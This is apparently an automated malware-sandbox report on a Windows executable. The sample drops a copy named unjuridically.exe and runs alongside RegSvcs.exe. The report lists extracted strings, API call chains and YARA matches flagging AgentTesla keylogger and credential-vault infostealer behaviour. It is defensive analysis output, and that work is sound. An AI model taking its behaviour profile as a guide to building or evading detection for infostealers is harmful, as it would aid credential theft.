                    Source: XoRPyi5s1i.exe, 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5f36ba7c-f
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: This is a third-party compiled AutoIt script.2_2_00FD3D19
                    Source: unjuridically.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: unjuridically.exe, 00000002.00000002.1635324675.000000000107E000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6aba3ba6-3
                    Source: unjuridically.exe, 00000002.00000002.1635324675.000000000107E000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5b3ab523-2
                    Source: unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1f7fff29-9
                    Source: unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_96679ed3-1
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00133742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,1_2_00133742
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001A00AF NtdllDialogWndProc_W,1_2_001A00AF
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001A0133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,1_2_001A0133
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001A044C NtdllDialogWndProc_W,1_2_001A044C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019E9AF NtdllDialogWndProc_W,CallWindowProcW,1_2_0019E9AF
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014AAFC NtdllDialogWndProc_W,1_2_0014AAFC
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014AB4F NtdllDialogWndProc_W,1_2_0014AB4F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019EC7C NtdllDialogWndProc_W,1_2_0019EC7C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,1_2_0019ECD4
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,1_2_0019EEEB
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014B11F NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W,1_2_0014B11F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,1_2_0019F1D7
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F2D0 SendMessageW,NtdllDialogWndProc_W,1_2_0019F2D0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,1_2_0019F351
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014B385 GetParent,NtdllDialogWndProc_W,1_2_0014B385
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,1_2_0014B55D
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F5AB NtdllDialogWndProc_W,1_2_0019F5AB
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F5DA NtdllDialogWndProc_W,1_2_0019F5DA
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F609 NtdllDialogWndProc_W,1_2_0019F609
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F654 NtdllDialogWndProc_W,1_2_0019F654
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F689 ClientToScreen,NtdllDialogWndProc_W,1_2_0019F689
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014B715 NtdllDialogWndProc_W,1_2_0014B715
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F7C3 GetWindowLongW,NtdllDialogWndProc_W,1_2_0019F7C3
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0019F7FF
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00FD3742
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01040133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_01040133
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010400AF NtdllDialogWndProc_W,2_2_010400AF
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0104044C NtdllDialogWndProc_W,2_2_0104044C
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103E9AF NtdllDialogWndProc_W,CallWindowProcW,2_2_0103E9AF
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEAAFC NtdllDialogWndProc_W,2_2_00FEAAFC
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEAB4F NtdllDialogWndProc_W,2_2_00FEAB4F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103EC7C NtdllDialogWndProc_W,2_2_0103EC7C
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_0103ECD4
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_0103EEEB
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_0103F1D7
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEB11F NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W,2_2_00FEB11F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_0103F351
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEB385 GetParent,NtdllDialogWndProc_W,2_2_00FEB385
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F2D0 SendMessageW,NtdllDialogWndProc_W,2_2_0103F2D0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F5AB NtdllDialogWndProc_W,2_2_0103F5AB
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F5DA NtdllDialogWndProc_W,2_2_0103F5DA
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00FEB55D
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F7C3 GetWindowLongW,NtdllDialogWndProc_W,2_2_0103F7C3
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0103F7FF
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F609 NtdllDialogWndProc_W,2_2_0103F609
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F654 NtdllDialogWndProc_W,2_2_0103F654
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F689 ClientToScreen,NtdllDialogWndProc_W,2_2_0103F689
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEB715 NtdllDialogWndProc_W,2_2_00FEB715
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00176606: CreateFileW,DeviceIoControl,CloseHandle,1_2_00176606
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,741A5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,1_2_0016ACC5
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001779D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_001779D3
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010179D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_010179D3
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0015B0431_2_0015B043
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00143B701_2_00143B70
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016410F1_2_0016410F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001502A41_2_001502A4
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016038E1_2_0016038E
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0013E3B01_2_0013E3B0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016467F1_2_0016467F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001506D91_2_001506D9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019AACE1_2_0019AACE
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00164BEF1_2_00164BEF
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0015CCC11_2_0015CCC1
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00136F071_2_00136F07
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0013AF501_2_0013AF50
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014B11F1_2_0014B11F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001931BC1_2_001931BC
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0015D1B91_2_0015D1B9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001432001_2_00143200
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0015123A1_2_0015123A
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016724D1_2_0016724D
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001713CA1_2_001713CA
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001393F01_2_001393F0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014F5631_2_0014F563
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001396C01_2_001396C0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017B6CC1_2_0017B6CC
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001377B01_2_001377B0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0019F7FF1_2_0019F7FF
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001679C91_2_001679C9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014FA571_2_0014FA57
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00139B601_2_00139B60
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00137D191_2_00137D19
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014FE6F1_2_0014FE6F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00159ED01_2_00159ED0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00137FA31_2_00137FA3
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0177E5801_2_0177E580
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FFB0432_2_00FFB043
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0100410F2_2_0100410F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FF02A42_2_00FF02A4
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0100038E2_2_0100038E
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FDE3B02_2_00FDE3B0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FF06D92_2_00FF06D9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0100467F2_2_0100467F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01004BEF2_2_01004BEF
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103AACE2_2_0103AACE
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FFCCC12_2_00FFCCC1
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FDAF502_2_00FDAF50
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD6F072_2_00FD6F07
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010331BC2_2_010331BC
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FFD1B92_2_00FFD1B9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEB11F2_2_00FEB11F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FF123A2_2_00FF123A
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010113CA2_2_010113CA
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FE32002_2_00FE3200
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD93F02_2_00FD93F0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0100724D2_2_0100724D
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEF5632_2_00FEF563
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD96C02_2_00FD96C0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0103F7FF2_2_0103F7FF
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD77B02_2_00FD77B0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0101B6CC2_2_0101B6CC
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010079C92_2_010079C9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEFA572_2_00FEFA57
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FE3B702_2_00FE3B70
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD9B602_2_00FD9B60
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD7D192_2_00FD7D19
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FF9ED02_2_00FF9ED0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEFE6F2_2_00FEFE6F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FD7FA32_2_00FD7FA3
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_015AE5E02_2_015AE5E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00AD4A883_2_00AD4A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00AD3E703_2_00AD3E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00ADAE573_2_00ADAE57
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00AD41B83_2_00AD41B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D0AD783_2_05D0AD78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D0C8573_2_05D0C857
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D0C8583_2_05D0C858
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D866C03_2_05D866C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D831383_2_05D83138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D8B3093_2_05D8B309
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D852703_2_05D85270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D87E503_2_05D87E50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D8E4783_2_05D8E478
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D877703_2_05D87770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D800403_2_05D80040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D859AB3_2_05D859AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05D8003F3_2_05D8003F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 6_2_018C86606_2_018C8660
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01724A887_2_01724A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01723E707_2_01723E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0172AE587_2_0172AE58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_017241B87_2_017241B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0172AE577_2_0172AE57
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069B7E507_2_069B7E50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069B56707_2_069B5670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069BC2707_2_069BC270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069B2BC07_2_069B2BC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069BB3187_2_069BB318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069B77707_2_069B7770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069BE4787_2_069BE478
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069B5DC07_2_069B5DC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069B00407_2_069B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069B003F7_2_069B003F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: String function: 0015F8A0 appears 35 times
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: String function: 00156AC0 appears 42 times
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: String function: 0014EC2F appears 68 times
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: String function: 00FEEC2F appears 68 times
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: String function: 00FFF8A0 appears 35 times
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: String function: 00FF6AC0 appears 42 times
                    Source: XoRPyi5s1i.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: XoRPyi5s1i.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9887281760772659
                    Source: unjuridically.exe.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9887281760772659
